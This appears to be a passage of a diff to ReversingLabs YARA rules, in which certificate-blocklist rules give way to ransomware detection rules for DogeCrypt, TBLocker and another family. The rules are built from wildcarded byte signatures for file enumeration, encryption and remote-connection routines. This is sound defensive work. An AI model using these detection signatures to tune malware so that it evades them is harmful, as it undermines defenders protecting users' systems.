-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$find_files = {
+            68 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F1 89 B5 ?? ?? ?? ?? 8B 7D ?? 33 DB
+            6A ?? 59 33 C0 89 5D ?? 89 4D ?? 66 89 45 ?? 89 5D ?? 89 5D ?? 89 4D ?? 66 89 45 ??
+            68 ?? ?? ?? ?? 8B D7 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8D 4D ?? 3B C8
+            74 ?? 88 9D ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 83 7D ?? ?? 8D 8D ?? ?? ?? ?? 8D 45 ?? 0F 43 45 ?? 51 50 FF 15 ?? ?? ?? ??
+            8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 66 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 8D
+            4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B D7 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8D 8D
+            ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ??
+            C6 85 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 4D ?? 50 E8 ?? ?? ?? ??
+            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? F6 85
+            ?? ?? ?? ?? ?? 8D 45 ?? 74 ?? 6A ?? 50 8B CE E8 ?? ?? ?? ?? 8B F0 85 F6 0F 85 ?? ??
+            ?? ?? 8B B5 ?? ?? ?? ?? EB ?? 83 7D ?? ?? 68 ?? ?? ?? ?? 0F 43 45 ?? 50 FF 15 ?? ??
+            ?? ?? 85 C0 74 ?? 83 7D ?? ?? 8D 45 ?? 0F 43 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ??
+            8D 85 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 53 FF 15 ?? ??
+            ?? ?? 8B 1D ?? ?? ?? ?? FF D3 8B F0 83 FE ?? 75 ?? 83 7F ?? ?? 8B C7 72 ?? 8B 07 68
+            ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 83 7F ?? ?? 72 ?? 8B 3F 57 FF 15 ?? ??
+            ?? ?? 85 C0 75 ?? FF D3 8B F0 EB ?? FF 15 ?? ?? ?? ?? EB ?? 33 F6 8D 4D ?? E8 ?? ??
+            ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? C2
+        }
+		$remote_connection_p1 = {
+            55 8B EC 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 8B 5D ?? 56 57 6A ?? 8B FA 8B F1
+            FF 15 ?? ?? ?? ?? 33 C0 50 50 89 45 ?? 89 45 ?? 8D 45 ?? 50 8D 45 ?? 50 6A ?? 57 56
+            FF 15 ?? ?? ?? ?? 8B D3 8B C8 E8 ?? ?? ?? ?? 83 3B ?? 8B F0 75 ?? 68 ?? ?? ?? ?? EB
+            ?? 81 3B ?? ?? ?? ?? 75 ?? 68 ?? ?? ?? ?? 8B CB E8 ?? ?? ?? ?? EB ?? 81 3B ?? ?? ??
+            ?? 74 ?? 81 3B ?? ?? ?? ?? 74 ?? 85 F6 74 ?? 83 C8 ?? EB ?? 83 65 ?? ?? 8D 75 ?? 8B
+            45 ?? 8B FB C6 45 ?? ?? C7 45 ?? ?? ?? ?? ?? A5 A5 A5 8B 4D ?? 5F 5E 33 CD 5B E8 ??
+            ?? ?? ?? C9 C3
+        }
+		$remote_connection_p2 = {
+            55 8B EC 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 8B 5D ?? 56 57 6A ?? 8B FA 8B F1
+            FF 15 ?? ?? ?? ?? 33 C0 50 50 50 89 45 ?? 8D 45 ?? 50 FF 75 ?? 57 56 FF 15 ?? ?? ??
+            ?? 8B D3 8B C8 E8 ?? ?? ?? ?? 83 3B ?? 8B F0 75 ?? 68 ?? ?? ?? ?? EB ?? 81 3B ?? ??
+            ?? ?? 75 ?? 68 ?? ?? ?? ?? 8B CB E8 ?? ?? ?? ?? 85 F6 74 ?? 83 C8 ?? EB ?? 83 65 ??
+            ?? 8D 75 ?? 8B 45 ?? 8B FB C6 45 ?? ?? C7 45 ?? ?? ?? ?? ?? A5 A5 A5 8B 4D ?? 5F 5E
+            33 CD 5B E8 ?? ?? ?? ?? C9 C3
+        }
+		$encrypt_files_p1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? 53 56 57 A1 ?? ?? ?? ??
+            33 C5 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B F1 8B 45 ?? 83 F8 ?? C7 45 ?? ?? ?? ?? ?? 0F
+            94 C7 83 F8 ?? 0F 94 C3 83 F8 ?? 75 ?? B8 ?? ?? ?? ?? EB ?? 0F B6 C3 83 F0 ?? 8D 04
+            45 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 50 6A ?? FF 76 ?? FF 15 ?? ?? ?? ?? 8B C8 89 4E ??
+            85 C9 0F 84 ?? ?? ?? ?? 84 FF 74 ?? BF ?? ?? ?? ?? EB ?? 0F B6 C3 8D 3C 45 ?? ?? ??
+            ?? 8B 56 ?? 8B 46 ?? 85 D2 7C ?? 0F 8F ?? ?? ?? ?? 85 C0 72 ?? 85 D2 7C ?? 0F 8F ??
+            ?? ?? ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 83 F8 ?? 74 ?? 89 55 ?? EB ?? 0F 57 C0 66 0F 13
+            45 ?? 8B 45 ?? FF 75 ?? 50 FF 75 ?? FF 75 ?? 57 51 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D
+            4D ?? 89 46 ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ??
+            59 5F 5E 5B 8B E5 5D C2
+        }
+		$encrypt_files_p2 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? 56 A1 ?? ?? ?? ?? 33 C5
+            50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B F1 83 7E ?? ?? C7 45 ?? ?? ?? ?? ?? 0F 85 ?? ?? ??
+            ?? 8B 4D ?? 85 C9 74 ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? EB ?? 8B 45 ?? 85 C0 74 ?? 0F
+            8E ?? ?? ?? ?? 83 F8 ?? 7E ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? EB ?? F6 C1 ?? C7 45 ?? ??
+            ?? ?? ?? B8 ?? ?? ?? ?? 0F 95 C0 40 89 45 ?? 83 7D ?? ?? 7F ?? 0F 8C ?? ?? ?? ?? 83
+            7D ?? ?? 0F 82 ?? ?? ?? ?? 83 7D ?? ?? 7F ?? 0F 8C ?? ?? ?? ?? 83 7D ?? ?? 0F 82 ??
+            ?? ?? ?? 83 EC ?? 8D 45 ?? 8B CC 50 E8 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 8D 45 ?? 8B
+            CE 50 E8 ?? ?? ?? ?? 8D 45 ?? 8B CE 50 E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D
+            ?? E8 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5E 8B E5 5D C2 ?? ?? 8D 45 ?? 6A
+            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 C6 45 ??
+            ?? E8 ?? ?? ?? ?? 8D 45 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 50 68 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 50 C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83
+            C4 ?? 8D 4D ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 45
+            ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 C6
+            45 ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 50 68 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 50 C6 45 ?? ?? E8
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Open Source Developer, SINGH ADITYA" and pe.signatures [ i ] . serial == "04:c8:ec:a7:24:32:08:a1:10:de:a9:26:c7:ad:89:ce" and 1404172799 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $remote_connection_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_157C3A4A6Bcf35Cf8453E6B6C0072E1D : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Dogecrypt : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing GovRAT malware."
+		description = "Yara rule that detects DogeCrypt ransomware."
 		author = "ReversingLabs"
-		id = "4bae3fb2-7e30-598e-8708-b985697bf63a"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "e0ca22a5-70bb-5d2c-bce4-bac49c2a81d2"
+		date = "2021-04-28"
+		modified = "2021-04-28"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L1490-L1506"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "2a68051ab6d0b967f08e44d91b9f13d75587ea0f16e2a5536ccf5898445e1a58"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.DogeCrypt.yara#L1-L114"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "1c19862884cf1e59d12c84f5ff6f799a4087ddc8bd887e0d2ce7da053642b851"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "DogeCrypt"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files_DogeCrypt_p1 = {
+            50 E8 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ??
+            ?? BA ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 0F 43 15 ?? ?? ?? ?? 8B 85
+            ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 2B C6 89 B5 ?? ?? ?? ?? 3B C8 77 ?? 83 BD ?? ?? ?? ??
+            ?? 8D 3C 31 8D 04 09 89 BD ?? ?? ?? ?? 50 8B 85 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? 0F 43
+            B5 ?? ?? ?? ?? 52 8D 04 46 50 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 66 89 04 7E EB ?? 51 52
+            C6 85 ?? ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7D ??
+            ?? 8D 45 ?? 8B 35 ?? ?? ?? ?? 0F 43 45 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68
+            ?? ?? ?? ?? 50 FF D6 8B F8 83 FF ?? 74 ?? 83 BD ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A
+            ?? 0F 43 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 50 FF D6 8B
+            F0 83 FE ?? 0F 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B
+            8D ?? ?? ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ??
+            2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 95 ?? ??
+            ?? ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ??
+            ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ??
+            ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ??
+            ?? ?? 83 C4 ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? ?? ??
+            ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ??
+            ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ??
+            ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83
+        }
+		$encrypt_files_DogeCrypt_p2 = {
+            C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 95 ?? ?? ?? ?? 83
+            FA ?? 0F 82 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ??
+            ?? 0F 82 ?? ?? ?? ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? E9
+            ?? ?? ?? ?? 90 6A ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF
+            15 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? BA ?? ?? ?? ?? 81 F9 ?? ?? ?? ?? 0F 42 DA 85 C0 74
+            ?? 85 C9 74 ?? 51 8D 85 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 6A ??
+            53 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ??
+            ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? EB ?? 56 8B 35 ?? ?? ?? ?? FF D6 57
+            FF D6 83 7D ?? ?? 8D 45 ?? 0F 43 45 ?? 50 FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? 52 51 E8
+            ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 33 C0 66 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
+            ?? 89 85 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ??
+            ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83
+            C4 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5
+            5D C3
+        }
+		$find_files_DogeCrypt = {
+            8B FF 55 8B EC 51 8B 4D ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 57 8B 7D ?? 2B CA 8B C7 41
+            F7 D0 89 4D ?? 3B C8 76 ?? 6A ?? 58 EB ?? 53 56 8D 5F ?? 03 D9 6A ?? 53 E8 ?? ?? ??
+            ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? FF
+            75 ?? 2B DF 8D 04 3E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 5D ?? 8B
+            CB E8 ?? ?? ?? ?? 33 FF 89 45 ?? 85 C0 74 ?? 56 E8 ?? ?? ?? ?? 8B 75 ?? 59 EB ?? 8B
+            43 ?? 89 30 8B F7 83 43 ?? ?? 57 E8 ?? ?? ?? ?? 59 8B C6 5E 5B 5F 8B E5 5D C3 33 FF
+            57 57 57 57 57 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33
+            C5 89 45 ?? 8B 4D ?? 53 8B 5D ?? 57 8B 7D ?? 89 9D ?? ?? ?? ?? EB ?? 8A 01 3C ?? 74
+            ?? 3C ?? 74 ?? 3C ?? 74 ?? 51 57 E8 ?? ?? ?? ?? 59 59 8B C8 3B CF 75 ?? 8A 11 80 FA
+            ?? 75 ?? 8D 47 ?? 3B C8 74 ?? 53 33 DB 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 33 DB
+            80 FA ?? 74 ?? 80 FA ?? 74 ?? 8A C3 80 FA ?? 75 ?? B0 ?? 0F B6 C0 2B CF 41 F7 D8 56
+            1B C0 23 C1 68 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ??
+            83 C4 ?? 8D 85 ?? ?? ?? ?? 53 53 53 50 53 57 FF 15 ?? ?? ?? ?? 8B F0 8B 85 ?? ?? ??
+            ?? 83 FE ?? 75 ?? 50 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B D8 83 FE ?? 74 ?? 56 FF 15
+            ?? ?? ?? ?? 8B C3 5E 8B 4D ?? 5F 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 48 ?? 2B 08
+            C1 F9 ?? 89 8D ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 8A 8D ?? ?? ?? ?? 84 C9 74 ??
+            80 F9 ?? 75 ?? 38 9D ?? ?? ?? ?? 74 ?? 50 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 50
+            E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0
+            8B 85 ?? ?? ?? ?? 75 ?? 8B 10 8B 40 ?? 8B 8D ?? ?? ?? ?? 2B C2 C1 F8 ?? 3B C8 0F 84
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? E9
+        }
+		$decrypt_DesucryptKeyContainer_DogeCrypt = {
+            68 ?? ?? ?? ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? E8 ?? ?? ?? ?? C7 45 ?? ??
+            ?? ?? ?? 8D 55 ?? 83 7D ?? ?? 8B 5D ?? 8B 35 ?? ?? ?? ?? 0F 43 D3 A1 ?? ?? ?? ?? 8B
+            4D ?? 2B C6 89 75 ?? 3B C8 77 ?? 83 3D ?? ?? ?? ?? ?? 8D 3C 31 8D 04 09 89 3D ?? ??
+            ?? ?? 50 8B 45 ?? BE ?? ?? ?? ?? 0F 43 35 ?? ?? ?? ?? 52 8D 04 46 50 E8 ?? ?? ?? ??
+            83 C4 ?? 33 C0 66 89 04 7E EB ?? 51 52 C6 45 ?? ?? FF 75 ?? 51 B9 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8B 5D ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 8D 0C 45 ?? ?? ?? ??
+            8B C3 81 F9 ?? ?? ?? ?? 72 ?? 8B 5B ?? 83 C1 ?? 2B C3 83 C0 ?? 83 F8 ?? 0F 87 ?? ??
+            ?? ?? 51 53 E8 ?? ?? ?? ?? 83 C4 ?? 83 3D ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 6A ?? 0F 43
+            05 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ??
+            8B F0 83 FE ?? 0F 84 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8D 45 ?? 6A ?? 50 6A ?? 68 ?? ??
+            ?? ?? 56 FF D3 83 F8 ?? 0F 85 ?? ?? ?? ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 50 E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 8D 45 ?? 6A ??
+            50 C6 07 ?? FF 35 ?? ?? ?? ?? 57 56 FF D3 83 F8 ?? 75 ?? BA ?? ?? ?? ?? B9 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 35 ?? ??
+            ?? ?? 57 FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? BA ?? ?? ?? ?? B9 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ??
+            ?? ?? EB ?? 33 C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ??
+            ?? ?? 8B E5 5D C3 E8 ?? ?? ?? ?? E8
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Favorite-III" and pe.signatures [ i ] . serial == "15:7c:3a:4a:6b:cf:35:cf:84:53:e6:b6:c0:07:2e:1d" and 1404172799 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $decrypt_DesucryptKeyContainer_DogeCrypt ) and ( $find_files_DogeCrypt ) and ( all of ( $encrypt_files_DogeCrypt_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_04422F12037Bc2032521Dbb6Ae02Ea0E : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Tblocker : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing GovRAT malware."
+		description = "Yara rule that detects TBLocker ransomware."
 		author = "ReversingLabs"
-		id = "0dc659e8-1f3b-5130-a776-dd9e4141f5f3"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "91793018-baf6-5e70-83b6-8793482c3bec"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L1508-L1524"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "381d749d24121d6634656fd33adcda5c3e500ee77a6333f525f351a2ee589e2c"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.TBLocker.yara#L1-L85"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "81f0077655ac0e59cd8dc05be602ae500c938668bd57d3cf4a51fbff2a5b6b83"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "TBLocker"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$main_ransomware_function_p1 = {
+            00 02 16 28 ?? ?? ?? ?? 00 02 17 28 ?? ?? ?? ?? 00 02 16 28 ?? ?? ?? ?? 00 02 16 28 ?? ?? ?? ?? 00 02
+            16 28 ?? ?? ?? ?? 00 02 28 ?? ?? ?? ?? 00 00 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ??
+            ?? 16 FE ?? 0A 06 2C ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 72 ?? ?? ?? ??
+            28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 18 16 15 28 ?? ?? ?? ?? 26 00 00 28 ?? ?? ?? ?? 28 ?? ??
+            ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 16 FE ?? 0B 07 39 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72
+            ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 FE ?? 0C 08 2C ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ??
+            ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ??
+            ?? ?? ?? 28 ?? ?? ?? ?? 00 00 00 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 17 6F ??
+            ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 00 DE ?? 25
+            28 ?? ?? ?? ?? 0D 00 28 ?? ?? ?? ?? DE ?? 00 02 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 02 17 28 ?? ?? ?? ??
+            00 02 18 28 ?? ?? ?? ?? 00 02 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ??
+            6C 23 ?? ?? ?? ?? ?? ?? ?? ?? 5B 02 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 6C 23 ?? ?? ?? ?? ?? ?? ?? ?? 5B 59
+        }
+		$main_ransomware_function_p2 = {
+            28 ?? ?? ?? ?? B7 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 6C 23 ?? ?? ?? ?? ?? ?? ??
+            ?? 5B 28 ?? ?? ?? ?? B7 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 02 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ??
+            ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 6C 23 ?? ?? ?? ?? ?? ?? ?? ?? 5B 02 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 6C 23
+            ?? ?? ?? ?? ?? ?? ?? ?? 5B 59 28 ?? ?? ?? ?? B7 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ??
+            ?? 6C 23 ?? ?? ?? ?? ?? ?? ?? ?? 5B 23 ?? ?? ?? ?? ?? ?? ?? ?? 5A 28 ?? ?? ?? ?? B7 73 ?? ?? ?? ?? 6F
+            ?? ?? ?? ?? 00 02 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 6C 23 ?? ??
+            ?? ?? ?? ?? ?? ?? 5B 02 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 6C 23 ?? ?? ?? ?? ?? ?? ?? ?? 5B 59 28 ?? ?? ??
+            ?? B7 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 1F ?? DA 73 ?? ?? ?? ?? 6F ?? ?? ?? ??
+            00 02 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 6C 23 ?? ?? ?? ?? ?? ??
+            ?? ?? 5B 02 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 6C 23 ?? ?? ?? ?? ?? ?? ?? ?? 5B 59 28 ?? ?? ?? ?? B7 28 ??
